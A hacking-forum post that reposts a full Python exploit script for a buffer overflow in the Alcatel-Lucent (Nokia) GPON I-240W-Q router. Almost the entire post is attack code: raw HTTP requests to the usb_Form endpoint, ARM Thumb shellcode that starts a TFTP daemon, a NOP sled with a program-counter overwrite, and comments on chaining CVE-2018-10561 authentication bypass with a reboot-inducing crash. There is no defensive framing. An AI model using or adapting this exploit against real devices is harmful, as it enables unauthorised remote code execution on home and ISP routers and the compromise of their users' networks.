Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

 Share


RenX6

Recommended Posts

#!/usr/bin/python3


import argparse
import requests
import urllib.parse
import binascii
import re


def run(target):
    """ Execute exploitation """
    # We're using CVE-2018-10561 and/or it's extension in order to exploit this 
    # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this 
    # issue after successful authentication: "useradmin" permission is enough
    #
    # IP Spoofing. Perspective option here too
    #

    # Step 1. Just a request to adjust stack for the exploit to work
    #
    # POST /GponForm/device_Form?script/ HTTP/1.1
    # Host: 192.168.1.1
    # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
    # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    # Accept-Language: en-US,en;q=0.5
    # Accept-Encoding: gzip, deflate
    # Referer: http://192.168.1.1/device.html
    # Content-Type: application/x-www-form-urlencoded
    # Content-Length: 55
    # Connection: close
    # Upgrade-Insecure-Requests: 1
    #
    # XWebPageName=device&admin_action=usb_enable&usbenable=1

    headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
            'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',
            'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
    payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}
    try:
      requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)
    except:
      pass

    # Step 2. Actual Exploitation
    #
    # POST /GponForm/usb_Form?script/ HTTP/1.1
    # Host: 192.168.1.1
    # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
    # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    # Accept-Language: en-US,en;q=0.5
    # Accept-Encoding: gzip, deflate
    # Referer: http://192.168.1.1/usb.html
    # Content-Type: application/x-www-form-urlencoded
    # Content-Length: 639
    # Connection: close
    # Upgrade-Insecure-Requests: 1

    # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1
    
    # Weaponizing request:

    # mov    r8, r8 ; NOP for ARM Thumb

    nop = "\xc0\x46"
    
    # .section .text
    # .global _start
    # 
    # _start:
    # .code 32
    # add r3, pc, #1
    # bx r3
    # 
    # ; We've removed prev commands as processor is already in Thumb mode
    #
    # .code 16
    # add   r0, pc, #8
    # eor   r1, r1, r1
    # eor   r2, r2, r2
    # strb  r2, [r0, #10] ; Changing last char of command to \x00 in runtime
    # mov   r7, #11
    # svc   #1
    # .ascii "/bin/tftpdX"  

    shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58"

    # Overwritting only 3 bytes in order to get \x00 in 4th

    pc = "\xe1\x8c\x03"

    exploit = "A" + 197 * nop + shellcode + 26*"A" + pc 

    payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', 
            'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', 
            'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}
    headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
            'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',
            'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 
            'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}    
    # Prevent requests from URL encoding
    payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items())
    try:
      requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)
    except:
      pass

    print("The payload has been sent. Please check UDP 69 port of router for the tftpd service");
    print("You can use something like: sudo nmap -sU -p 69 192.168.1.1");


def main():
    """ Parse command line arguments and start exploit """
    
    #
    # Exploit should be executed after reboot. You can easily achive this in 3 ways:
    # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that
    # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page
    # 3) Repeat this exploit at least twice ;)
    # any of those will work!
    #
    
    parser = argparse.ArgumentParser(
            add_help=False,
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="Examples: %(prog)s -t http://192.168.1.1/")

    # Adds arguments to help menu
    parser.add_argument("-h", action="help", help="Print this help message then exit")
    parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/")

    # Assigns the arguments to various variables
    args = parser.parse_args()

    run(args.target)


#
# Main
#

if __name__ == "__main__":
    main()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...